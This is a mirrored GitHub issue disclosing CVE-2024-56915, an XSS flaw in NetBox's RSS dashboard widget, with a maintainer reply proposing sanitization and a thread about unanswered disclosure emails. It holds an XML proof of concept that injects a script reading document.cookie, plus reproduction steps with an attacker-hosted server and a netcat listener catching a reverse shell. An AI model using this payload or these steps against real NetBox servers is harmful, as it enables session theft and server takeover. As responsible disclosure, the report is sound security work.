XSS in RSS Feed Summary Tag can lead to RCE or SuperUser Creation - CVE-2024-56915 #10644

New Issue

adam · 2025-12-29T21:34:04+01:00

adam commented

2025-12-29 21:34:04 +01:00

Originally created by @noxlumens on GitHub (Jan 12, 2025).

Deployment Type

Self-hosted

Triage priority

I'm a NetBox Labs customer

NetBox Version

4.2.1

Python Version

3.12

Steps to Reproduce

I've sent a full list of vulnerabilities I've located to security@netboxlabs.com. The report was sent late last year. I've upgaded to the latest version v4.2.1 and I've confirmed each vulnerability. A malicious RSS feed could potentially create a SuperUser or get a reverse shell via remote code execution. For that to be the case and administrator would need to have the malicious rss feed on their dashboard or have the ability to add rss widgets, create users/superusers, and/or upload scripts.

/netbox-4.2.1/netbox/templates/extras/dashboard/widgets/rssfeed.html

    {% for entry in feed.entries %}
      <div class="list-group-item px-1 py-2">
        <a href="{{ entry.link }}" class="text-body">{{ entry.title }}</a>
        <div class="text-secondary">
          {{ entry.summary|safe }}
        </div>
      </div>

Craft an xml file with the RSS Feed Proof of Concept code.
Start a python3 web server on attacker server in the directory hosting the xml file.
python3 -m http.server 80
Navigate to the NetBox dashboard and add an RSS widget.
Edit the RSS widget to point to the attacker controlled IP address and save.
Refresh the Dashboard.

RSS Feed Proof of Concept

A general proof of concept is provided below. The SessionID cookie is being protected by httponly flag. The alternative scripts allow the attacker to perform remote code execution for shell access on the NetBox server and create a new superuser but I don't believe I should post them here.

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>Sample RSS Feed</title>
    <link>https://www.example.com</link>
    <description>Example RSS feed with a summary</description>
    <language>en-us</language>
    <pubDate>Sat, 23 Nov 2024 00:00:00 GMT</pubDate>
    <item>
      <title> Blog Post</title>
      <link>https://www.example.com/first-blog-post</link>
      <guid>https://www.example.com/first-blog-post</guid>
      <pubDate>Sat, 23 Nov 2024 12:00:00 GMT</pubDate>
      <summary>&lt;script&gt;alert(document.cookie)&lt;/script&gt;This is a brief summary of the blog post.</summary>
    </item>

  </channel>
</rss>

Reproduce the Attack

Copy the Proof Of Concept - RSS Remote Code Execution code to an xml file. (not posting it here)
Edit the server_ip in the XML file to the attacker controlled IP Address.
Start a python3 web server in the directory hosting the xml file

python3 -m http.server 80

Start a netcat listener

nc -nlvp 9006

Navigate to the netbox dashboard and add an RSS widget
Edit the RSS widget to point to the attacker controlled IP address and save.
Refresh the Dashboard. After a few seconds the file should be pulled from the attacker server and uploaded to the NetBox server. The shell connection should come back to the attacker controlled netcat listener

Expected Behavior

I do not expect that an external rss feed I've connected to my netbox labs source could create a superuser or get a reverse shell on my netbox server.

Observed Behavior

Remote Code Execution -> Reverse Shell
SuperUser was created

Originally created by @noxlumens on GitHub (Jan 12, 2025). ### Deployment Type Self-hosted ### Triage priority I'm a NetBox Labs customer ### NetBox Version 4.2.1 ### Python Version 3.12 ### Steps to Reproduce I've sent a full list of vulnerabilities I've located to security@netboxlabs.com. The report was sent late last year. I've upgaded to the latest version v4.2.1 and I've confirmed each vulnerability. A malicious RSS feed could potentially create a SuperUser or get a reverse shell via remote code execution. For that to be the case and administrator would need to have the malicious rss feed on their dashboard or have the ability to add rss widgets, create users/superusers, and/or upload scripts. `/netbox-4.2.1/netbox/templates/extras/dashboard/widgets/rssfeed.html` ```xml {% for entry in feed.entries %} <div class="list-group-item px-1 py-2"> <a href="{{ entry.link }}" class="text-body">{{ entry.title }}</a> <div class="text-secondary"> {{ entry.summary|safe }} </div> </div> ``` 1. Craft an xml file with the RSS Feed Proof of Concept code. 2. Start a python3 web server on attacker server in the directory hosting the xml file. `python3 -m http.server 80` 1. Navigate to the NetBox dashboard and add an RSS widget. 2. Edit the RSS widget to point to the attacker controlled IP address and save. 3. Refresh the Dashboard. ### **RSS Feed Proof of Concept** A general proof of concept is provided below. The SessionID cookie is being protected by httponly flag. The alternative scripts allow the attacker to perform remote code execution for shell access on the NetBox server and create a new superuser but I don't believe I should post them here. ```xml <?xml version="1.0" encoding="UTF-8"?> <rss version="2.0"> <channel> <title>Sample RSS Feed</title> <link>https://www.example.com</link> <description>Example RSS feed with a summary</description> <language>en-us</language> <pubDate>Sat, 23 Nov 2024 00:00:00 GMT</pubDate> <item> <title> Blog Post</title> <link>https://www.example.com/first-blog-post</link> <guid>https://www.example.com/first-blog-post</guid> <pubDate>Sat, 23 Nov 2024 12:00:00 GMT</pubDate> <summary><script>alert(document.cookie)</script>This is a brief summary of the blog post.</summary> </item> </channel> </rss> ``` ###### Reproduce the Attack 1. Copy the Proof Of Concept - RSS Remote Code Execution code to an xml file. (not posting it here) 2. Edit the server_ip in the XML file to the attacker controlled IP Address. 3. Start a python3 web server in the directory hosting the xml file ```python python3 -m http.server 80 ``` 3. Start a netcat listener ```sh nc -nlvp 9006 ``` 4. Navigate to the netbox dashboard and add an RSS widget 5. Edit the RSS widget to point to the attacker controlled IP address and save. 6. Refresh the Dashboard. After a few seconds the file should be pulled from the attacker server and uploaded to the NetBox server. The shell connection should come back to the attacker controlled netcat listener ### Expected Behavior I do not expect that an external rss feed I've connected to my netbox labs source could create a superuser or get a reverse shell on my netbox server. ### Observed Behavior Remote Code Execution -> Reverse Shell SuperUser was created

adam added the type: bug status: accepted severity: medium labels 2025-12-29 21:34:04 +01:00

adam closed this issue

2025-12-29 21:34:04 +01:00

adam commented

2025-12-29 21:34:04 +01:00

@jeremystretch commented on GitHub (Jan 13, 2025):

I'm a NetBox Labs customer

Could you please provide your account ID?

I've sent a full list of vulnerabilities I've located to security@netboxlabs.com. The report was sent late last year.

I'm sorry but I don't see any correspondence regarding this topic. What was the date you contacted us?

Looks like this is simply an XSS within the configured RSS feed, which is not default behavior and would need to be explicitly configured by the user to point to a malicious or compromised feed. We can probably just pass the RSS content through nh3 for sanitization.

@jeremystretch commented on GitHub (Jan 13, 2025): > I'm a NetBox Labs customer Could you please provide your account ID? > I've sent a full list of vulnerabilities I've located to [security@netboxlabs.com](mailto:security@netboxlabs.com). The report was sent late last year. I'm sorry but I don't see any correspondence regarding this topic. What was the date you contacted us? Looks like this is simply an XSS within the configured RSS feed, which is not default behavior and would need to be explicitly configured by the user to point to a malicious or compromised feed. We can probably just pass the RSS content through nh3 for sanitization.

adam commented

2025-12-29 21:34:04 +01:00

@noxlumens commented on GitHub (Jan 13, 2025):

Hey Jeremy, Sorry. I misunderstood the Netbox Labs Customer identifier. My company only uses the community edition at this time and do not have an account ID. I sent my initial email on Sat, Nov 23, 2024 at 9:20 PM, Fri, Nov 29, 2024 at 11:47 AM, Fri, Dec 27, 2024 at 9:23 AM, Sat, Jan 11, 2025 at 3:33 PM.

@noxlumens commented on GitHub (Jan 13, 2025): Hey Jeremy, Sorry. I misunderstood the Netbox Labs Customer identifier. My company only uses the community edition at this time and do not have an account ID. I sent my initial email on Sat, Nov 23, 2024 at 9:20 PM, Fri, Nov 29, 2024 at 11:47 AM, Fri, Dec 27, 2024 at 9:23 AM, Sat, Jan 11, 2025 at 3:33 PM.

adam commented

2025-12-29 21:34:05 +01:00

@noxlumens commented on GitHub (Jan 18, 2025):

@jeremystretch Were you able to locate the emails I sent to security@netboxlabs.com? The subject line contained "Vulnerability Disclosure Netbox Community". If it's easier, I can put in a new issue here for the other vulnerabilities since they were also in the community edition. I did verify they were also in version 4.2.1

@noxlumens commented on GitHub (Jan 18, 2025): @jeremystretch Were you able to locate the emails I sent to security@netboxlabs.com? The subject line contained "Vulnerability Disclosure Netbox Community". If it's easier, I can put in a new issue here for the other vulnerabilities since they were also in the community edition. I did verify they were also in version 4.2.1

adam commented

2025-12-29 21:34:05 +01:00

@noxlumens commented on GitHub (Feb 12, 2025):

@DanSheps I've attempted to reach out since November 2024 using the security@netboxlabs.com inbox. Can you verify if the inbox has been receiving my emails? I've sent a total of 6. I apologize for reaching out on a previously resolved and closed issue.

My emails were sent on the following dates:
Nov 23, 2024
Nov 29, 2024
Dec 27, 2024
Jan 11, 2025
Jan 18, 2025
Feb 6, 2025

@noxlumens commented on GitHub (Feb 12, 2025): @DanSheps I've attempted to reach out since November 2024 using the security@netboxlabs.com inbox. Can you verify if the inbox has been receiving my emails? I've sent a total of 6. I apologize for reaching out on a previously resolved and closed issue. My emails were sent on the following dates: Nov 23, 2024 Nov 29, 2024 Dec 27, 2024 Jan 11, 2025 Jan 18, 2025 Feb 6, 2025

Sign in to join this conversation.

Branches Tags

main

update-changelog-comments-docs

feature-removal-issue-type

20911-dropdown

20239-plugin-menu-classes-mutable-state

21097-graphql-id-lookups

feature

fix_module_substitution

20923-dcim-templates

20044-elevation-stuck-lightmode

feature-ip-prefix-link

v4.5-beta1-release

20068-import-moduletype-attrs

20766-fix-german-translation-code-literals

20378-del-script

7604-filter-modifiers-v3

circuit-swap

12318-case-insensitive-uniqueness

20637-improve-device-q-filter

20660-script-load

19724-graphql

20614-update-ruff

14884-script

02496-max-page

19720-macaddress-interface-generic-relation

19408-circuit-terminations-export-templates

20203-openapi-check

fix-19669-api-image-download

7604-filter-modifiers

19275-fixes-interface-bulk-edit

fix-17794-get_field_value_return_list

11507-show-aggregate-and-rir-on-api

9583-add_column_specific_search_field_to_tables

1 Participants

Notifications

Due Date

No due date set.

Dependencies

No dependencies set.

Reference: starred/netbox#10644